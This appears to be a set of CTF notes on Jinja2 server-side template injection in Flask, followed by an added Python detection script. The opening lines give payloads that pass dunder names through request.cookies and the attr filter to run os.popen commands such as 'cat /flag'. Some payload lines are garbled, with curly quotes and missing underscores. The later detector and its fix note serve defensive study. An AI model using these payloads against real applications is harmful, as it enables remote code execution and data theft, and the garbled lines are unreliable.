The attr filter fetches an attribute by name: ""|attr("__class__") is equivalent to "".__class__
Passing parameters via request.cookies
?name={{ (x|attr(request.cookies.x1)|attr(request.cookies.x2)|attr(request.cookies.x3))(request.cookies.x4).eval(request.cookies.x5) }}
Cookie values
x1=__init__;x2=__globals__;x3=__getitem__;x4=__builtins__; x5=__import__('os').popen('cat /flag').read()
?name={{init.globals.getitem.builtins.eval(import__(‘os’).popen(‘cat /flag’).read())}}
{{()[request.args.class].bases[0].subclasses()[59].init.globals.builtins‘eval’.popen(‘ls’).read()”)}}
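Detection side of the trick above, as an added example that is not part of the original notes: because the double-underscore names travel in the Cookie header (or in a second query argument), a filter that inspects only the name parameter never sees them, so the check has to resolve each request.cookies / request.args reference against the rest of the request. The function names and finding labels are assumptions of this example; the sample request is constructed from the values on this page.

```python
import re
from urllib.parse import urlsplit, parse_qsl

TEMPLATE = re.compile(r"\{\{|\{%")
# request.cookies.x1, request.args.x1, request.cookies['x1'], ...
INDIRECT = re.compile(r"request\.(cookies|args)(?:\.(\w+)|\[\s*['\"](\w+)['\"]\s*\])")
DUNDER = re.compile(r"__\w+?__")

# Constructed sample: the request shown on this page, split into URL and Cookie header.
SAMPLE_URL = ("/?name={{ (x|attr(request.cookies.x1)|attr(request.cookies.x2)"
              "|attr(request.cookies.x3))(request.cookies.x4).eval(request.cookies.x5) }}")
SAMPLE_COOKIE = ("x1=__init__; x2=__globals__; x3=__getitem__; x4=__builtins__; "
                 "x5=__import__('os').popen('cat /flag').read()")

def parse_cookie_header(header):
    """Split a raw Cookie header by hand; values may hold quotes and parentheses."""
    cookies = {}
    for part in header.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep:
            cookies[name] = value
    return cookies

def inspect_request(url, cookie_header=""):
    """Return findings for template expressions whose attribute names arrive out of band."""
    args = dict(parse_qsl(urlsplit(url).query, keep_blank_values=True))
    sources = {"cookies": parse_cookie_header(cookie_header), "args": args}
    findings = []
    for param, value in args.items():
        if not TEMPLATE.search(value):
            continue
        findings.append(("template-syntax", param, None))
        # Follow each indirect reference to the value the client actually sent.
        for m in INDIRECT.finditer(value):
            src, key = m.group(1), m.group(2) or m.group(3)
            supplied = sources[src].get(key, "")
            for name in DUNDER.findall(supplied):
                findings.append(("smuggled-dunder", f"{src}.{key}", name))
    return findings

if __name__ == "__main__":
    for finding in inspect_request(SAMPLE_URL, SAMPLE_COOKIE):
        print(finding)
```

Detection of this kind supplements the actual fix, which is to never render user input as template source.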